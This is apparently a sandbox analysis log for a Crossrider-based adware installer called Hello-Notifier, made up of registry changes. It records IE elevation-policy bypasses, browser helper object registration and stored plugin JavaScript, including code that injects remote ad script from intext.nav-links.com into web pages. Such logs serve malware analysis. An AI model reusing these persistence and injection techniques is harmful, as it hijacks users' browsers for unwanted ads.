Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Approved Extensions C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppName = "Hello-Notifier-enabler.exe-buttonutil64.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346}\AppName = "Hello-Notifier-enabler.exe-buttonutil.exe" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\123\JavaScript = "\n//------------------ PLUGIN intext_adv_m START ------------------\nif (typeof appAPI.internal.monetization === \"undefined\") { appAPI.internal.monetization = {}; }\nif (typeof appAPI.internal.monetization.plugins === \"undefined\") { appAPI.internal.monetization.plugins = {}; }\n\nappAPI.internal.monetization.plugins[123] = function() {\n\n if (!appAPI.internal.monetization.shouldRunByVertical(123, [\"intext\"])){\n return;\n }\n\n\t// boris don't want it on youtube for shop helper\n\tif (appAPI.appID == 33256 && appAPI.dom.location.href.indexOf(\"youtube.com\") !== -1) {\n\t\treturn;\n\t}\n\n\tif (!appAPI.dom.isHttps()) {\n\t\tappAPI.dom.addRemoteJS(\"http://intext.nav-links.com/js/intext.js?afid=crossrider&subid=\" + appAPI.internal.monetization.getSubId() + \"&maxlinks=8&linkcolor=#0000FF\");\n\t}\n};\n//------------------ PLUGIN intext_adv_m END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4\Version = "4" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\207 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Name = "tabsWrapper" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\39\Url = "http://app-static.crossrider.com/plugins/mins/ie/IEDatabase.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\38\Name = "IECallbacks" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\13\Url = "http://app-static.crossrider.com/plugins/mins/CrossriderAppUtils.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Crossrider C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\Params = "{\n \"source_id\" : \"000249\",\n \"sub_id\" : \"0\",\n \"uzid\" : \"0\"\n}\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\43\Version = "5" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102\Version = "5" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\64\Url = "http://app-static.crossrider.com/plugins/mins/appApiMessage.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\Version = "9" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Name = "hooks" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\PopupPluginList = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\UpdateInterval = "360" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\17 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\JavaScript = "\n//------------------ PLUGIN hooks START ------------------\nappAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};\n//------------------ PLUGIN hooks END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\FullVersionForUrl = "1_34_1_29" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\SrcId = "000249" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Manifest = "NA" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Url = "http://app-static.crossrider.com/plugins/mins/tabsWrapper.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
